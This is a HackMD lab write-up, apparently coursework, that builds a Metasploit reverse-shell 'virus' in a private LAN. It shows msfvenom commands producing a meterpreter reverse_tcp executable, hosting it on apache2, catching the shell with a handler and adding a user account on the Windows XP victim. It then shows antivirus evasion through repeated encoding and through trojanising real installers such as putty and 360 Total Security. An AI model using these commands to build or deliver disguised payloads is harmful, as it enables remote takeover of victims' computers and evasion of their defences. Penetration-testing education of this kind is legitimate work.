DIY Virus - HackMD

# DIY Virus ### Envirnement: * be Attacked server: * os: windows XP * ip : 192.168.43.130 * Attack server: kali 5.15.0 * os: kali linux 5.15.0 * ip : 192.168.43.132 * Tools: Metasploit * Test virus web: https://www.virustotal.com/gui/home/upload ## Solution * Using Msfvenom to build a payloads various. * Deploy payloads various to Web. ## Ckeck internet * check these servers are connect in same LAN * using command`ping` to check * ![](https://i.imgur.com/H53UlX0.png) * make sure your attack server cannect with internet, when we finish to build virus ![](https://i.imgur.com/E8p7uKb.png) ## Using Msfvenom * Before using this tools, we must to have these imformation * What kind os is we are attack. (linux, mac, linux, etc.) * We are attack in which way. In this case, are using web site to attack. * Be attacked ip. * Where to deploy the virus. * Using web to attack, so we decide build viruse in web service apache2. * Using command to build virus ``` .sh msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.132 LPORT=7749 -f exe > /var/www/html/cmds.exe ``` * Method: ``` .sh -p payload -f firewall use firewall setting policy reverse_tcp: not need to know ip not any rule to extra connect window can change other platform, Android, unix, Linux,etc. LHOST Local host Rhost/ Rport Be attacked port * Success message ``` .sh [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 354 bytes Final size of exe file: 73802 bytes ``` * Check the virus file ``` .sh ls /var/www/html/ ``` ![](https://i.imgur.com/5XHydjy.png) ## Deploy We deploy the virus on apache2 service, so the apache2 service must be restart, then check the url to download. * Restart apache2 service ``` .sh service apache2 restart ``` * Check the service is working ``` .sh service apache2 status ``` ![](https://i.imgur.com/mZBxsr5.png) ## Msfconsole Metasploit is Project build by Rapid7 to Penetration test. Msfconsole is Metasploits' command line interface. [Armitage](https://github.com/rsmudge/armitage) is GUI interface of Metasploit buildding by java. In this case, we're using msfconsole to build a handler to connect the server being attack. * open Metasploits' Msfconsole ``` .sh msfconsole ``` ![](https://i.imgur.com/5xaHIjj.png) * create a handler ``` .sh use exploit/multi/handler ``` * setting playload ``` .sh set payload windows/meterpreter/reverse_tcp ``` * setting lhost ``` .sh set lhost 192.168.43.132 ``` * setting lport ``` .sh set lport 7749 ``` * start handler ``` .sh run ``` * setting success ![](https://i.imgur.com/XzFB1Jn.png) ## Download virus on Windows and test Virus * Open blowser on windows. * Open the Attack server web by Attack server ip. ![](https://i.imgur.com/MHPpQxF.png) * Add the file name `cmds.exe` in the end of url to download the virus. ![](https://i.imgur.com/SN8158y.png) * Back to kali linux, check msconsole status when virus work success, msconsole will change to meterpreter to control the server be attacked. ![](https://i.imgur.com/ALk0rxe.png) ## Control and Attack server This is a simple to controls server is attacked to add a user. * Check the all the user before attack. There is no user call jack, so I'll add a user call jack. ![](https://i.imgur.com/JQrPFs0.png) * Open opwershell first ``` .sh shell ``` ![](https://i.imgur.com/jjKCHk2.png) * Using command to add jack account, and set password for 123456 ![](https://i.imgur.com/N9ZwvKo.png) ``` .sh net user /add jack 123456 ``` * Back to be attacked server, there is a new jack account. ![](https://i.imgur.com/1cbmUTb.png) ## Challenge: using Virsototal get point * Using Virstotal, to get your virs point, about cmds.exe. ![](https://i.imgur.com/370Espk.png) * Try to use other encoder. ``` .sh msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.132 LPORT=12345 -e x86/shikata_ga_nai -i 9 -f raw -b "\x00" > eoncodex.exe ``` ![](https://i.imgur.com/8SrtZQo.png) * Try to use other exe file to build, this case is use 360TS. ``` .sh msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.43.132 LPORT=7749 -f raw | msfvenom -a x86 --platform windows -e ruby/base64 -i 10 -f raw | msfvenom -a x86 --platform windows -e cmd/echo -i 10 -x 360TS_Setup_Mini.exe -f exe > 360Installer.exe ``` ![](https://i.imgur.com/PV9lGwt.png) * Try to use other exe file to build, this case is use putty. ``` .sh msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.132 LPORT=7749 -f raw -e x86/shikata_ga_nai -i 9 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 11 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 6 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 7 -x putty.exe -o putty2.exe ``` ![](https://i.imgur.com/hSapxBn.png) ## Reference * https://github.com/TideSec/BypassAntiVirus * https://thedarksource.com/msfvenom-cheat-sheet-create-metasploit-payloads/ * https://github.com/cyberteach360/msfvenom * https://www.golinuxcloud.com/inject-encoded-payload-shellter/ * https://www.iswatlab.eu/wp-content/uploads/2017/01/Technical_Report_Evasion.pdf